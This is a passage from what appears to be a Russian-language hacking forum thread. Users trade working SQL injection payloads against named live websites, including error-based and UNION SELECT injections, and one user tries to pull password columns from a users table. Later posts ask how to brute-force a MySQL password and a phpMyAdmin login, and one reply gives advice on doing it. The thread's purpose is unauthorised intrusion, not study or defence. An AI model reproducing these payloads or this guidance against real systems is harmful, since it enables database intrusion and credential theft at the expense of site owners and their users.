смотря на какой, нет доступа к Msysobjects, но есть доступ к Msysaccessobjects а остальные(не дефолтные) таблицы нужно брутить
AKYLA Code: http://banken.ruilen.nl/random.php?catid=473+group+by+concat(version(),rand(0)|0)+having+avg(0)--+ ололо ) думаем ребята )
Эм... А разница? https://forum.antichat.ru/showpost.php?p=2262240&postcount=14459 Ах да, я нашёл в чем разница. Твой способ обрезает часть версии.
Что где обрезанно? О_О что то я вас не понимаю молодой человек Раскрути ее своим запросом, вот тебе и разница PS:Хотя спорить бесполезно каждый кулик свое болото хвалит.
почему не показать номер? http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+ http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/newsletterContent.php?id=-9+union+select+1,2,3,4,5 =\ https://forum.antichat.ru/showthread.php?p=2254732
есть таблица users table_rows - 6 есть колонки name,pass когда делаю запрос union+select+......version()+from+users то все нормально а запрос union+select+......pass+from+users ничего не выдает что посоветуете?
Это операция Побитового "ИЛИ". Пример: Code: mysql> SELECT 29 | 15; +---------+ | 29 | 15 | +---------+ | 31 | +---------+ 1 row in set (0.00 sec) mysql> SELECT 5|9; +-----+ | 5|9 | +-----+ | 13 | +-----+ 1 row in set (0.01 sec) mysql> SELECT 2|96; +------+ | 2|96 | +------+ | 98 | +------+ 1 row in set (0.00 sec) mysql> SELECT 7|5; +-----+ | 7|5 | +-----+ | 7 | +-----+ 1 row in set (0.00 sec) Можешь сверить по калькулятору(кнопка OR).
Возможно луна в другой фазе. Code: UNION SELECT ...DATABASE() FROM USERS Code: UNION SELECT ...TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = 'users' Вполне вероятно, что базы разные.
Нашел SQL-Inj Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.
1. Зависит от сервера базы данных - если есть доступ к ней извне или с того же сервера, то можно пробовать брутить. 2. Если ситуация удовлетворяет первому условию, и ты начал брутить, то успех будет зависить от сложности пароля.
Да, нашел вход в phpmyadmin. Имя пользователя знаю. Авторизация через .htaccess Вопрос номер 2: При помощи чего брутить?